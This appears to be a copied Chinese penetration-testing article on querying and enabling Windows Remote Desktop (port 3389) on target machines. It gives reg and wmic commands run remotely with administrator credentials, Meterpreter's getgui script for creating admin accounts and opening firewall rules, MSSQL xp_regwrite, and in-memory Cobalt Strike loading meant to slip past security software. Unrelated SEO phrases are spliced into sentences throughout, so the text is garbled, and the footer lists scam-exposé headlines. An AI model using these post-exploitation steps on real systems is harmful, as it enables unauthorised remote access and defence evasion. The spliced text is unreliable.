0x01查询3389端口方式总结命令开启端口支持系统
创始人
2025-10-08 12:04:29
0次

0x01 查询3389端口格式汇总

(1)REG查询3389状态(0:ON,1:OFF)

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

(2)REG查询端口3389(16补码->10补码)

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /sREG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumberset /a Port=0xd3d

win7一打开软件就显示打开方式_软件快件图标win7显示_win7软件无法打开

(3)tasklist和netstat命令查询3389端口

tasklist /svc | findstr "TermService"netstat -ano | findstr "2028"

win7软件无法打开_软件快件图标win7显示_win7一打开软件就显示打开方式

注意:有时会出现特殊情况,比如虚拟主机构建的低权限用户运行的IIS(Userswin7一打开软件就显示打开方式,IIS_IUSRS),tasklist/svc不显示服务名,注册表检查0xd3dwin7一打开软件就显示打开方式,却没有3389在netstat -ano端口中,这可能是因为3389远程终端被关闭,而在Users权限下,我们只能凭个人经验盲目猜测可疑的终端口号。

(4)Meterpreter的netstat查询端口3389

有时我们会遇到无法执行netstat、tasklist、reg等命令的情况。 这时我们可以使用Meterpreter下的netstat命令快速查询3389端口,首先找到运行在0.0.0.0的svchost.exe,然后根据个人经验结束标语盲目猜测可疑。

常见的端口大家都知道,比如FTP、RPC等,就不详细说了。 有序端口指定不是,其余的是 58895。

win7一打开软件就显示打开方式_win7软件无法打开_软件快件图标win7显示

0x02 开放3389端口形式汇总

(1)MSF命令打开3389端口

支持系统:

meterpreter > run getgui -e
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.[!] Example: run post/windows/manage/enable_rdp OPTION=value [...][*] Windows Remote Desktop Configuration Meterpreter script by Darkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Enabling Remote Desktop[...SNIP...]

win7软件无法打开_win7一打开软件就显示打开方式_软件快件图标win7显示

注意:该脚本可用于打开目标机的3389远程桌面端口、创建管理员帐户密码、禁用远程桌面(TCP-In)防火墙入站规则等。

(2)REG命令打开3389端口

支持系统:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

(3)WMIC命令打开3389端口

支持系统:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1前提条件是确保“Windows Management Instrumentation(Winmgmt)”服务已正常启动。

win7软件无法打开_软件快件图标win7显示_win7一打开软件就显示打开方式

(4)WMIC打开远程主机的3389端口

支持系统:

wmic /node:192.168.0.103 /user:administrator /password:betasec PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

支持系统:

wmic /node:192.168.0.116 /user:administrator /password:betasec RDTOGGLE WHERE ServerName='WIN-TO2CN3V2VPR' call SetAllowTSConnections 1wmic /node:192.168.0.116 /user:administrator /password:betasec process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

win7一打开软件就显示打开方式_win7软件无法打开_软件快件图标win7显示

防范措施:

虽然是使用WMIC远程执行命令执行WMIC、REG等命令打开3389端口。

当 WMIC 远程打开端口 3389 时,%COMPUTERNAME% 环境变量不能用于替换远程主机的计算机名称。

错误:说明=由于UAC 用户帐户控制已打开,访问被拒绝,仅允许RID500 管理员执行此操作。

(5)Windows API开放3389端口

冷毅用C++写的“打开3389工具”有一个小问题。 在两台Windows2008机器上测试时,报告缺少vcruntime140.dll、api-ms-win-crt-runtime-l1-1-0.dll,可以自行调试编译。

软件快件图标win7显示_win7软件无法打开_win7一打开软件就显示打开方式

按照@冷逸大哥的想法,我也用C#写了一个,目标框架:.NETframework2.0,可以用CobaltStrikeexecute-assemble加载到显存中,实现不落地执行。 该工具的原理是利用RegCreateKeyEx和RegSetValueEx以及Microsoft.Win32RegistryKey这两个API与操作系统注册表类似,与不使用Net.exe添加管理员用户是一样的,直接使用Windows API来执行相应的操作! ! !

应用场景一:

当目标主机因某些安全软件的存在而难以用reg、wmic命令打开3389端口时,可以尝试使用该工具查询并打开3389端口,并可以使用execute-assemble加载到用于执行的视频内存。

软件快件图标win7显示_win7一打开软件就显示打开方式_win7软件无法打开

应用场景二:

由于目标主机有一些安全防护软件(如:某锁、某安全卫士),在拦截rundll32.exe时,无法使用execute-assemble将其加载到显存执行,所以只能选择在地面上执行它,到目前为止它仍然是打包的。

软件快件图标win7显示_win7一打开软件就显示打开方式_win7软件无法打开

(6)MSSQLxp_regwrite打开3389端口

应用场景:当xp_cmdshell被禁用/删除且难以恢复时,可以尝试使用xp_regread、xp_regwrite查询并开放目标机的3389端口,也可以选择使用sp_OACreate、AgentJob等命令执行方式。

1、查询3389开启状态exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server' ,'fDenyTSConnections'
2、查询3389远程桌面端口exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
3、开启3389远程桌面端口(0:ON、1:OFF)exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

win7一打开软件就显示打开方式_软件快件图标win7显示_win7软件无法打开

(7)查找一次打开3389端口失败的原因

电脑右键打开远程桌面或者REG、WMIC打开3389端口命令执行成功,并且netstat-ano中没有3389端口,tasklist/svc中也没有TermService服务。 最后在Services.msc中找到TermService服务时出现: 这些情况是由于对应的C:\Windows\System32\termsrv.dll文件不再存在所致。 可能是作者在测试RDPWrap项目时误删除的。

win7软件无法打开_win7一打开软件就显示打开方式_软件快件图标win7显示

启动TermService服务时必须加载Termsrv.dll,因此无法通过常规方法打开3389端口。 这时我们只需要将之前备份的termsrv.dll或者对应版本操作系统的termsrv.dll复制到C:\Windows\System32\目录下,启动TermService服务,然后重启3389远程桌面即可来解决问题。

软件快件图标win7显示_win7一打开软件就显示打开方式_win7软件无法打开

[往届TOP5]

win7一打开软件就显示打开方式_软件快件图标win7显示_win7软件无法打开

软件快件图标win7显示_win7一打开软件就显示打开方式_win7软件无法打开

如果对您有帮助,请点击分享、点赞、观看!

相关内容

热门资讯

大浪淘金APP黑幕揭秘:内盘操...   大浪淘金APP平台最隐蔽的黑幕,在于其完全封闭的内盘交易系统。这个看似与国际市场接轨的交易平台,...
告别固定工资实现财富自由?一品...   普通投资者被广告宣传诱导,注册就送现金,充值返现金券等等这些宣传方式,都是在引流到平台开户,不怕...
哈易购APP打着现货交易幌子搞...   网络上各类白银、铂金等贵金属投资广告铺天盖地,不少平台以"现货交易"为名,暗中却从事着非法期货交...
5元起投!高额收益?中国白银、...   上海华通白银国际交易中心有限公司(以下简称“华通白银国际”)打着“白银、铂金现货订购”的旗号,实...
"九州订购APP、起...   近年来,贵金属投资热度持续攀升,但乱象也随之而来。一些不法分子趁机搭建虚假交易平台,打着"低门槛...
坚锅淘金APP投资者频繁爆仓亏...   坚锅淘金APP对外宣称是贵金属现货交易平台,日常出入金看似畅通无阻,给人一种合规运营的假象。但事...
斗金订购APP“5元订购现货”...   斗金订购APP“5元订购现货”骗局揭秘:充值易、回本难,越陷越深!  许多投资人在未核实平台合规...
贵金属APP乱象曝光:&quo...   当前市场上部分贵金属类APP未取得正规交易资质,涉嫌误导消费者参与白银、铂金等商品的非合规交易!...
华通白银、银宝街APP被指虚假...   警惕现货白银投资陷阱:上海华通白银背后的平台涉嫌非法期货交易  近年来,各类现货白银交易平台以“...
充值送300,月入过万?别被量...   如今,网络上充斥着大量未经批准的贵金属及其他产品订购交易平台。这些平台普遍缺乏合法经营资质,却将...
鑫汇智投APP贵金属非法期货、...   鑫汇智投APP贵金属非法期货、人为控盘,大量投资者遭恶意收割  鑫汇智投APP长期以“低门槛、高...
矅光智策APP非法贵金属交易骗...   不少投资人在矅光智策APP上进行贵金属交易后出现了严重亏损。许多人在下载该平台时,根本不清楚其是...
飞鸽订购APP非法期货交易骗局...   飞鸽订购APP非法期货交易骗局,很多投资者根本没搞懂规则就盲目充值,买涨买跌跟买cai票一样!平...
天龙白银APP被操控的非法期货...   中小投资者在网络平台参与商品现货订购交易,表面看似合规合法,实则暗藏诸多难以察觉的风险。商品现货...
下载送试玩金?千万别碰!带你揭...   当前,许多贵金属APP交易平台正采用欺诈性营销手段。它们通过抖音等短视频平台,以“5元起投”“充...
泡泡淘金APP骗局:打着&qu...   泡泡淘金APP骗局:打着"商品订购"幌子,实则非法期货收割投资者!投资需谨慎,切勿轻信“高额回报...
南商云购APP虚假电子盘背后的...   南商云购是虚假电子盘吗?它是否具备合规的交易资质?这个曾经的"现货电子盘"如今摇身一变,披上了"...
警惕"祥龙订购&qu...   祥龙订购APP、掌上银牛APP等平台背后的运营方——四川禄宏商品现货市场有限公司,仅具备现货交易...
中国白银、华银:虚假宣传、后台...   中国白银APP宣称是上市公司“中国白银集团”与“上海华通白银国际交易中心”旗下的现货交易平台,提...
起底“优品订购”APP非法期货...   “优品订购”APP根本不具备任何合法的交易资质。其背后的运营方仅凭随便注册一家公司、开发一款交易...